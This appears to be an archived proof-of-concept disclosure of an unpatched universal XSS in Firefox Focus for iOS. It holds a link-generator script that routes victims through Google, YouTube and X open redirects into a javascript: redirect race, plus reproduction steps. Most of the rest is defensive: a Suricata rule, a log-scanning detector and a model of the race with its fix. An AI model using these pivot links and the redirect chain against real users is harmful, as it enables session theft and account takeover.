PoC Archive

FirefUXSS: Universal XSS in Firefox Focus for iOS via Redirect-Scheme Validation Race Condition

by @RenwaX23 (V12 Security) · 2026-06-08

CVSS: 9.3/10
Severity: Critical
Category: web
Affected product: Firefox Focus for iOS
Affected versions: Latest available version at time of testing (per upstream disclosure)
Disclosed: 2026-06-08
Patch status: unpatched

Metadata

Field                Value
Date Added           2026-06-08
Last Updated         2026-06-08
Author / Researcher  @RenwaX23 (V12 Security)
CVE / Advisory       N/A
Category             web
Severity             Critical
CVSS Score           9.3 (CVSSv3.1)
Status               Unpatched
Tags                 UXSS, XSS, race-condition, TOCTOU, redirect-validation, javascript-scheme, iOS, Firefox Focus
Related              N/A

Affected Target

Field                    Value
Software / System        Firefox Focus for iOS
Versions Affected        Latest available version at time of testing (per upstream disclosure)
Language / Platform      iOS browser / WebKit-based mobile browsing context
Authentication Required  No
Network Access Required  Yes

Summary

FirefUXSS is a universal XSS issue in Firefox Focus for iOS where redirect-scheme validation can be bypassed via a race condition. A burst of benign redirects can desynchronize validation from navigation commit, allowing a final javascript: redirect to execute. The JavaScript then runs with the origin of the previously loaded page, enabling cross-origin script execution on high-value domains reached through open redirects.


Vulnerability Details

Root Cause

Firefox Focus performs dangerous-scheme validation for redirect targets, but the check is not atomic with navigation commit. This creates a TOCTOU window where the navigation pipeline can commit a redirect target before the javascript: scheme rejection is effectively enforced.

Attack Vector

An attacker lures a victim to an attacker-controlled page loaded in _self, pivots the browsing context through a target-origin open redirect, then triggers a rapid redirect chain ending in javascript:. If timing is favorable, the browser executes that final payload in the inherited origin context.

Impact

Successful exploitation gives attacker-controlled JavaScript execution in arbitrary target origins the victim traverses (for example, Google/X/YouTube/Reddit in the public PoC). This can enable session theft, account takeover, and unauthorized actions in authenticated sessions.


Environment / Lab Setup

OS:          iOS device (or simulator) with Firefox Focus installed
Target:      Firefox Focus for iOS (unpatched build)
Attacker:    Controlled web server hosting PoC page and redirect endpoint
Tools:       python3 (link generator), optional PHP web host, HTTPS endpoint

Setup Steps

python3 exploit.py --attacker-url 'https://attacker.example/poc.php?redirect=1'

Proof of Concept

Step-by-Step Reproduction

  1. Host the PoC endpoint controlled by the researcher (for example poc.php?redirect=1):

     php -S 0.0.0.0:8080

  2. Generate a pivot URL that routes through a target-origin open redirect:

     python3 exploit.py --attacker-url 'https://attacker.example/poc.php?redirect=1'

  3. Open one generated URL in Firefox Focus for iOS and allow the navigation in _self; the final redirect races into a javascript: URI and, if the timing lands, executes in the inherited target origin.

Exploit Code

See exploit.py in this folder for a minimal pivot-link generator.

from exploit import build_pivot_links

links = build_pivot_links("https://attacker.example/poc.php?redirect=1")
print(links["google"])

Expected Output

[+] Generated FirefUXSS pivot links:
  - google: https://www.google.com/url?q=...
  - youtube: https://www.youtube.com/redirect?q=...
  - x: https://x.com/safety/unsafe_link_warning?unsafe_link=...

[+] If vulnerable, final JavaScript executes in inherited target origin context.

Screenshots / Evidence

  • screenshots/ — add reproduction video or browser-origin evidence from authorized testing

Detection & Indicators of Compromise

- Bursts of chained 3xx redirects from a single client to the same attacker-controlled path within a short window.
- A Location header whose target uses the javascript: scheme (or data:/file:), typically as the last hop of such a burst.
- Pivots through known open-redirect endpoints (for example google.com/url, youtube.com/redirect, x.com/safety/unsafe_link_warning) whose destination is attacker infrastructure that then issues the chain.

SIEM / IDS Rule (example, Suricata 5+ syntax):

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"Possible Firefox Focus redirect-scheme race exploitation (javascript: in Location header)";
  flow:established,to_client;
  http.header; content:"Location|3a|"; nocase;
  content:"javascript|3a|"; nocase; distance:0; within:16;
  classtype:web-application-attack;
  sid:900260608; rev:2;
)

A Location header travels in the server's response, so the rule has to match to_client traffic; a rule pointed at $HTTP_SERVERS would never see it. The two-content form with distance/within tolerates a missing or extra blank after the colon instead of assuming exactly "Location: ". The chain in the PoC is served from attacker infrastructure over HTTPS, so a passive sensor only sees this header when TLS is terminated at the proxy; otherwise the signal has to come from proxy or endpoint logs.
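The three indicators listed above, run over a constructed forward-proxy log. This is an added example written for this page, not tooling from the upstream PoC repository: the log format (epoch seconds, client, host, path with query, status, Location header or "-"), the hosts and the thresholds are assumptions. The open-redirect endpoints are the three that exploit.py emits.

```python
"""Indicator checks for the FirefUXSS redirect chain over a constructed proxy log."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Open-redirect endpoints the PoC pivots through, keyed (host, path) -> name of the
# query parameter that carries the destination. Taken from exploit.py on this page.
OPEN_REDIRECTS = {
    ("www.google.com", "/url"): "q",
    ("www.youtube.com", "/redirect"): "q",
    ("x.com", "/safety/unsafe_link_warning"): "unsafe_link",
}

# Constructed sample log (assumed format, not real traffic):
#   <epoch seconds> <client> <host> <path?query> <status> <Location header or ->
SAMPLE_LOG = """\
1000.0 10.0.0.5 www.google.com /url?q=https%3A%2F%2Fattacker.example%2Fpoc.php%3Fredirect%3D1&sa=D 302 https://attacker.example/poc.php?redirect=1
1000.1 10.0.0.5 attacker.example /poc.php?redirect=1 302 https://attacker.example/poc.php?redirect=2
1000.2 10.0.0.5 attacker.example /poc.php?redirect=2 302 https://attacker.example/poc.php?redirect=3
1000.3 10.0.0.5 attacker.example /poc.php?redirect=3 302 https://attacker.example/poc.php?redirect=4
1000.4 10.0.0.5 attacker.example /poc.php?redirect=4 302 https://attacker.example/poc.php?redirect=5
1000.5 10.0.0.5 attacker.example /poc.php?redirect=5 302 javascript:alert(document.domain)
1003.0 10.0.0.7 www.google.com /url?q=https%3A%2F%2Fexample.org%2F&sa=D 302 https://example.org/
1003.4 10.0.0.7 example.org / 200 -
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (.+)$")


def parse_line(line):
    """One log line -> event dict, or None for lines that do not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, host, target, status, location = m.groups()
    parts = urlsplit(target)  # splits "path?query" without needing a scheme/host
    return {"ts": float(ts), "client": client, "host": host, "path": parts.path,
            "query": parts.query, "status": int(status),
            "location": None if location == "-" else location}


def parse_log(text):
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def redirect_bursts(events, min_hops=4, window=2.0):
    """Indicator 1: min_hops or more 3xx answers from one host+path to one client
    inside a sliding window of `window` seconds."""
    stamps_by_key = defaultdict(list)
    for e in events:
        if 300 <= e["status"] < 400:
            stamps_by_key[(e["client"], e["host"], e["path"])].append(e["ts"])
    findings = []
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        start, best = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hops:
            findings.append(("redirect_burst", key, best))
    return findings


def dangerous_locations(events):
    """Indicator 2: Location header whose scheme is javascript:, data: or file:
    (leading blanks stripped and case folded, as a browser would)."""
    return [("dangerous_location", e["client"], e["host"], e["location"])
            for e in events
            if (e["location"] or "").lstrip().lower().startswith(("javascript:", "data:", "file:"))]


def open_redirect_pivots(events):
    """Indicator 3: a known open-redirect endpoint whose destination host later
    serves a 3xx to the same client, i.e. the pivot-then-chain shape of the PoC."""
    redirectors = {(e["client"], e["host"]) for e in events if 300 <= e["status"] < 400}
    findings = []
    for e in events:
        param = OPEN_REDIRECTS.get((e["host"], e["path"]))
        if not param:
            continue
        for dest in parse_qs(e["query"]).get(param, []):   # parse_qs percent-decodes
            dest_host = urlsplit(dest).hostname
            if dest_host and (e["client"], dest_host) in redirectors:
                findings.append(("open_redirect_pivot", e["client"], e["host"], dest_host))
    return findings


def scan(text):
    events = parse_log(text)
    return redirect_bursts(events) + dangerous_locations(events) + open_redirect_pivots(events)


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Against the constructed log the scan yields one finding per indicator, all for client 10.0.0.5; the second client pivots through the same Google endpoint to a host that never redirects, so it is not flagged. The third check is the one that survives TLS, since the pivot URL itself is visible in proxy logs even when the attacker's Location headers are not.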

Remediation

Action            Detail
Patch             Apply the Mozilla fix for Firefox Focus for iOS redirect handling once one is available
Workaround        Avoid opening untrusted redirect chains; block attacker-controlled intermediary domains where possible
Config Hardening  Reject javascript:/data:/file: redirect targets at every layer, and make scheme validation atomic with navigation commit: validate the URL that is actually committed, not the one that was pending when the check ran
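The race described under Root Cause and Attack Vector, and the validate-at-commit hardening the last row above prescribes, as a minimal model. This is an added example, not Firefox Focus source: the two pipeline classes, their method names and the single pending-target slot are assumptions standing in for the browser's navigation pipeline, and asyncio's FIFO scheduling makes the interleaving deterministic rather than timing-dependent. scheme_of() also shows why the rejection is only as strong as the parse behind it: a WHATWG-style parser strips leading controls and embedded tab/newline and folds case before it reads the scheme, so the check has to do the same.

```python
"""Model of the validate-then-commit race behind FirefUXSS, next to the atomic fix.

Added illustration; the pipeline shape is an assumption, not Firefox Focus code.
"""
import asyncio
import re

DANGEROUS_SCHEMES = {"javascript", "data", "file"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def scheme_of(url: str) -> str:
    """Scheme as a WHATWG URL parser sees it: strip leading/trailing C0 controls and
    space, drop embedded tab/CR/LF, compare case-insensitively."""
    cleaned = url.strip(C0_AND_SPACE)
    for ch in "\t\r\n":
        cleaned = cleaned.replace(ch, "")
    m = SCHEME_RE.match(cleaned.lower())
    return m.group(1) if m else ""


def is_dangerous(url: str) -> bool:
    return scheme_of(url) in DANGEROUS_SCHEMES


class RacyPipeline:
    """Vulnerable shape: the scheme check reads the pending target when a redirect
    arrives, but the commit step runs one hop later and reads the slot again."""

    def __init__(self) -> None:
        self.target = None      # single mutable "pending navigation" slot
        self.committed = []

    def redirect(self, url: str) -> asyncio.Task:
        self.target = url
        return asyncio.create_task(self._validate_then_commit())

    async def _validate_then_commit(self) -> str:
        checked = self.target                 # time of check
        if is_dangerous(checked):
            return "blocked"
        await asyncio.sleep(0)                # async hop: other redirects land here
        self.committed.append(self.target)    # time of use: slot may have changed
        return "committed"


class AtomicPipeline:
    """Fixed shape: the scheme check runs at commit, on the exact URL being committed,
    so no redirect can slip in between check and use."""

    def __init__(self) -> None:
        self.target = None
        self.committed = []

    def redirect(self, url: str) -> asyncio.Task:
        self.target = url
        return asyncio.create_task(self._commit())

    async def _commit(self) -> str:
        await asyncio.sleep(0)                # same async hop as above
        url = self.target
        if is_dangerous(url):                 # validate what is actually committed
            return "blocked"
        self.committed.append(url)
        return "committed"


async def _burst(pipeline, hops):
    """Attacker-side timing: each hop's validation starts before the next one lands."""
    tasks = []
    for url in hops[:-1]:
        tasks.append(pipeline.redirect(url))
        await asyncio.sleep(0)
    tasks.append(pipeline.redirect(hops[-1]))  # final hop: the javascript: URI
    return await asyncio.gather(*tasks)


def run_chain(pipeline_cls, hops):
    """Drive a redirect chain through a pipeline; returns (committed URLs, per-hop results)."""
    pipeline = pipeline_cls()
    results = asyncio.run(_burst(pipeline, hops))
    return pipeline.committed, list(results)


# Constructed chain shaped like the PoC: open-redirect pivot, benign attacker hops,
# then a javascript: target (hosts are placeholders, not the public demo endpoint).
CHAIN = [
    "https://www.google.com/url?q=https%3A%2F%2Fattacker.example%2Fpoc.php%3Fredirect%3D1",
    "https://attacker.example/poc.php?redirect=1",
    "https://attacker.example/poc.php?redirect=2",
    " JavaScript:alert(document.domain)",   # leading blank + mixed case on purpose
]

if __name__ == "__main__":
    for cls in (RacyPipeline, AtomicPipeline):
        committed, results = run_chain(cls, CHAIN)
        print(f"{cls.__name__}: {results} committed={committed}")
```

With RacyPipeline the javascript: hop is rejected on its own validation but still gets committed by the hop that was validated just before it, which is the TOCTOU the advisory describes; with AtomicPipeline the same chain commits only the https hops and rejects the javascript: target twice. The mixed-case, leading-blank payload is accepted by scheme_of() as "javascript", which is the behaviour a naive startswith("javascript:") check would miss.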

References


Notes

Auto-ingested from https://github.com/v12-security/pocs/tree/main/firefox on 2026-06-08.

The disclosure timeline in the upstream notes gives a report submission date of 2025-07-04 and public release on 2026-06-08, with no patch available at the time of release.

exploit.py
#!/usr/bin/env python3
"""Generate pivot links used in the FirefUXSS Firefox Focus iOS PoC."""

from __future__ import annotations

import argparse
from urllib.parse import quote


def build_pivot_links(attacker_url: str) -> dict[str, str]:
    """Return redirect-based pivot links for major origins used by the PoC."""
    encoded = quote(attacker_url, safe="")
    return {
        "google": (
            "https://www.google.com/url"
            f"?q={encoded}&sa=D&sntz=1&usg=AOvVaw1uB0j5rrgN2xkfoBgA9G0T"
        ),
        "youtube": f"https://www.youtube.com/redirect?q={encoded}",
        "x": f"https://x.com/safety/unsafe_link_warning?unsafe_link={encoded}",
    }


def main() -> None:
    parser = argparse.ArgumentParser(
        description="Generate FirefUXSS pivot URLs for authorized testing."
    )
    parser.add_argument(
        "--attacker-url",
        default="https://firefoxuxss.v12.sh/poc.php?redirect=1",
        help="Attacker-controlled PoC endpoint (default: public demo endpoint)",
    )
    args = parser.parse_args()

    links = build_pivot_links(args.attacker_url)

    print("[+] Generated FirefUXSS pivot links:")
    for name, url in links.items():
        print(f"  - {name}: {url}")

    print("\n[!] Open one URL in Firefox Focus for iOS using authorized test targets only.")


if __name__ == "__main__":
    main()